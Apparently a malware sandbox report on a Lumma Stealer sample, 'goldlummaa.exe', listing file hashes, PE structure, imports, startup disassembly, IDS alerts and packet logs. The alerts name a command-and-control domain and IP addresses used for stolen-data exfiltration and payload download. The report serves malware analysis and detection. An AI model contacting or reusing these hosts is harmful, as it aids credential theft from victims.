                                                                                                                 Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7460</Pi
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4619
                                                                                                                Entropy (8bit):4.4734410099372965
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zsWJg77aI9alWpW8VYbMYm8M4JM505T9bBFg+q8P5Pn7HQO5vz25v5d:uIjfsI7oU7VAJZkEHQozg5d
                                                                                                                MD5:00EC86131D898DE54582BFE6511814BF
                                                                                                                SHA1:D612BA3C08789F61AD520EB5007C2E0CF1E8629B
                                                                                                                SHA-256:B99D578D70FFAA0417E88C14FAF12C6E34B547D78A9F29DF8125BE446327D8D0
                                                                                                                SHA-512:4960F1565B3BB2A641C20EB957DB4B4D155A7FB1257974A2067E87A4D9F3516F9F192E00CB30DED1CAA7B403DB36660684D86E1FA3A354BADA5D26AB3BC3C7AB
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                 Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="19045" /> <arg nm="vercsdbld" val="2006" /> <arg nm="verqfe" val="2006" /> <arg nm="csdbld" val="2006" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="2057" /> <arg nm="geoid" val="223" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="636740" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.789.19041.0-11.0.1000" /> <arg nm="portos" val="0" /> <arg nm="ram" val="409
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 13:18:43 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):122432
                                                                                                                Entropy (8bit):1.9737507369073177
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:iS8eOC4f4P1BIRS1J9wvxlSnYOeLskvXqeO+x1m02osWJwCLr61Sm+cG9O:iSagP1BIRiPnbwqZ+iisWOw+DG8
                                                                                                                MD5:3C204E69710E4C51E5D8147828080E7D
                                                                                                                SHA1:E4B6451F3AF9D62A012320411C30284EE174E270
                                                                                                                SHA-256:A36C262247B6F2B13952DB0FF18385EA9D963294509AAA5EAF0A051A091D26BC
                                                                                                                SHA-512:4A66DCB730415E06776D7F13529353DD50AD9B0A0DD00108B05B31B503968F000E0D776ED0FD2511238997D1AC44B7B7A011B09FFE5FA631B0135FECA1A13A75
                                                                                                                Malicious:false
                                                                                                                 Preview:MDMP [binary data] GenuineIntel [binary data] Eastern Standard Time [binary data] Eastern Summer Time [binary data] 19041.1.amd64fre.vb_release.191206-1406 [binary data]
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6352
                                                                                                                Entropy (8bit):3.7196574676071985
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:RSIU6o7wVetbdn6IhTKYWMmfkr5aMQURC89bPoKsf09em:R6l7wVeJdn6IhmYWx8pDRC89bQKsf0wm
                                                                                                                MD5:7DCB72F901DD5148BCB43506920DC6A4
                                                                                                                SHA1:2F5B7F3E341EE1733EF441ADDD0500667A3171D8
                                                                                                                SHA-256:E8DF4532A0A87837A358010F5EE613104785D5AC4B5E38B811EDF2201DB000B7
                                                                                                                SHA-512:EAB94EDE41658E6F0C408A5F798345DB4D84B16CC2CE8D5C7003C9F68E6E7209CC0CCA6416CE28FD7E629D5817053E8CD45A9DEAABAD2503B8DE4C2414971518
                                                                                                                Malicious:false
                                                                                                                 Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7460</Pi
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1835008
                                                                                                                Entropy (8bit):4.393793366356998
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:il4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAqOBSqa:y4vF0MYQUMM6VFYSqU
                                                                                                                MD5:359227D5109C7949792CC522B55CDD8A
                                                                                                                SHA1:FDB1DF37A41D2326297CEC84A85A20DEE503AFB9
                                                                                                                SHA-256:DEFA0A370BECF3D1D7E71FE53BCBF3B0485401874DF132FDF79E088614396583
                                                                                                                SHA-512:649F9DC69116A3827CEB4BCC14DBD1A02E0EDBDA1C96EEA6CBD452950989A3B38BC18D2ABBFB00B9FC0073E7F7BE606A0326681F9B3F1625EAB748E32CF728CD
                                                                                                                Malicious:false
                                                                                                                 Preview:regf [binary data] \AppCompat\Programs\Amcache.hve [binary data]
                                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.751338544197567
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:goldlummaa.exe
                                                                                                                File size:405'504 bytes
                                                                                                                MD5:876bf2dec67ea8626322d2c268219d76
                                                                                                                SHA1:ecb0c0cd486733491804a05cf387f2d04d5e2279
                                                                                                                SHA256:08d37bbc1881f5fbfdcc84e3270320bb4d03a3ad4fcdf1d996c9de0ca8f2b425
                                                                                                                SHA512:9268392683a9962143f987f069d97016abd1ccd61bb67aa8e3f8d9c4b7aa6168d3c01884ce9023831216b8710eddee2d52fcb3c84dbacefe94cb28fa661b6a79
                                                                                                                SSDEEP:6144:vdoOpYMkIn20q2g3XEaO2mtVAo7xTYGqIz4dlKub1hdj294cHczD/+OEjB8iHotV:vdoOphZgHWvAmz4dZb1rj2OWDbjHon
                                                                                                                TLSH:A684F12171C0C872E2B3153219B1DFAA5A7EFA200F90AEDF678C15B64F755C089349BB
                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...bI\g..........".................\L............@.......................................@.................................D~..(..
                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                Entrypoint:0x404c5c
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows cui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x675C4962 [Fri Dec 13 14:49:06 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:2716f32d1d63b3fc977d6064633b778d
                                                                                                                Instruction
                                                                                                                call 00007F4EB0B6F36Ah
                                                                                                                jmp 00007F4EB0B6EF89h
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                push dword ptr [ebp+08h]
                                                                                                                call 00007F4EB0B6F11Fh
                                                                                                                neg eax
                                                                                                                pop ecx
                                                                                                                sbb eax, eax
                                                                                                                neg eax
                                                                                                                dec eax
                                                                                                                pop ebp
                                                                                                                ret
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                cmp dword ptr [0041B4F0h], FFFFFFFFh
                                                                                                                push dword ptr [ebp+08h]
                                                                                                                jne 00007F4EB0B6F119h
                                                                                                                call 00007F4EB0B71731h
                                                                                                                jmp 00007F4EB0B6F11Dh
                                                                                                                push 0041B4F0h
                                                                                                                call 00007F4EB0B716B4h
                                                                                                                pop ecx
                                                                                                                pop ecx
                                                                                                                xor ecx, ecx
                                                                                                                test eax, eax
                                                                                                                cmove ecx, dword ptr [ebp+08h]
                                                                                                                mov eax, ecx
                                                                                                                pop ebp
                                                                                                                ret
                                                                                                                push 00000008h
                                                                                                                push 00418D38h
                                                                                                                call 00007F4EB0B6F650h
                                                                                                                and dword ptr [ebp-04h], 00000000h
                                                                                                                mov eax, 00005A4Dh
                                                                                                                cmp word ptr [00400000h], ax
                                                                                                                jne 00007F4EB0B6F16Fh
                                                                                                                mov eax, dword ptr [0040003Ch]
                                                                                                                cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                jne 00007F4EB0B6F15Eh
                                                                                                                mov ecx, 0000010Bh
                                                                                                                cmp word ptr [eax+00400018h], cx
                                                                                                                jne 00007F4EB0B6F150h
                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                mov ecx, 00400000h
                                                                                                                sub eax, ecx
                                                                                                                push eax
                                                                                                                push ecx
                                                                                                                call 00007F4EB0B6F292h
                                                                                                                pop ecx
                                                                                                                pop ecx
                                                                                                                test eax, eax
                                                                                                                je 00007F4EB0B6F139h
                                                                                                                cmp dword ptr [eax+24h], 00000000h
                                                                                                                jl 00007F4EB0B6F133h
                                                                                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                mov al, 01h
                                                                                                                jmp 00007F4EB0B6F131h
                                                                                                                mov eax, dword ptr [ebp-14h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                xor ecx, ecx
                                                                                                                cmp dword ptr [eax], C0000005h
                                                                                                                sete cl
                                                                                                                mov eax, ecx
                                                                                                                ret
                                                                                                                mov esp, dword ptr [ebp-18h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17e44 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d000 | 0xe8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1e000 | 0x12fc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x12808 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x17fac | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x10c15 | 0x10e00 | 05d7420100633613bdbd5a889171c5f7 | False | 0.5704427083333333 | data | 6.50620173764596 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x12000 | 0x7294 | 0x7400 | 4965eb04eb8b1b66b8d84a097bc01bc3 | False | 0.3977976831896552 | data | 4.65662016842751 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1a000 | 0x1c10 | 0x1200 | 6a2a147d595c2e66ddd7fdd872225955 | False | 0.4281684027777778 | data | 4.604642940636322 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.OO | 0x1c000 | 0x4 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1d000 | 0xe8 | 0x200 | 0713d2c4e51a805f2ce8d9843bcbad43 | False | 0.306640625 | data | 2.337865625306241 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1e000 | 0x12fc | 0x1400 | c56221e7af6185e7585b1796050bcf12 | False | 0.778515625 | data | 6.424268394395036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss | 0x20000 | 0x47e00 | 0x47e00 | e181aee4ec0f2cb24b0263d3bda0c975 | False | 1.0003260869565218 | data | 7.999269659506522 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x1d060 | 0x87 | XML 1.0 document, ASCII text | English | United States | 0.8222222222222222
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T14:17:38.040410+0100 | 2058230 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) | 1 | 192.168.2.9 | 62158 | 1.1.1.1 | 53 | UDP
2024-12-18T14:17:39.594103+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.9 | 49722 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:39.594103+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49722 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:40.391480+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49722 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:40.391480+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49722 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:41.765494+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.9 | 49728 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:41.765494+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49728 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:43.299167+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.9 | 49728 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:43.299167+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49728 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:44.904371+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.9 | 49734 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:44.904371+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49734 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:49.032054+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.9 | 49745 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:49.032054+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49745 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:54.303194+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.9 | 49756 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:54.303194+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49756 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:59.203645+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.9 | 49769 | 104.21.50.161 | 443 | TCP
2024-12-18T14:17:59.203645+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49769 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:01.489309+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.9 | 49769 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:03.131445+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.9 | 49780 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:03.131445+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49780 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:11.769477+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.9 | 49801 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:11.769477+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49801 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:13.537532+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49801 | 104.21.50.161 | 443 | TCP
2024-12-18T14:18:15.030238+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.9 | 49807 | 185.215.113.16 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Dec 18, 2024 14:17:43.495155096 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.495160103 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.640080929 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.640137911 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.640225887 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.640571117 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.640584946 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:44.904262066 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:44.904371023 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:44.906492949 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:44.906507969 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:44.906775951 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:44.908054113 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:44.908236980 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:44.908267975 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.371505976 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.371781111 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.371850967 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.371877909 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.371891022 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.500345945 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.500395060 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.500484943 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.500813007 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.500828981 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.031884909 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.032053947 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.033648014 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.033655882 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.033948898 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.035337925 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.035495043 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.035525084 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.035680056 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.083338976 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:52.387547016 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:52.387748003 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:52.387829065 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:52.387952089 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:52.387975931 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:53.035037994 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:53.035085917 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:53.035159111 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:53.035701990 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:53.035717010 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.303069115 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.303194046 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.304678917 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.304686069 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.305021048 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.309602022 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.309768915 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.309809923 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.309890985 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.309899092 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.466108084 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.466193914 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.466255903 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.466443062 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.466464043 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.986156940 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.986207008 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.986304998 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.987334013 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.987344980 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:59.203564882 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:59.203644991 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:59.205456018 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:59.205465078 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:59.205698013 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:59.207034111 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:59.207139015 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:59.207143068 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.489305973 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.489413977 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.489485025 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.489656925 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.489679098 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.916040897 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.916094065 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.916193962 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.916564941 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.916583061 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.131371021 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.131444931 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.138328075 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.138345003 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.138689995 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.144411087 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.145531893 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.145567894 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.145662069 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.145706892 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.145822048 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.145853043 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.145982027 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.146008015 CET44349780104.21.50.161192.168.2.9
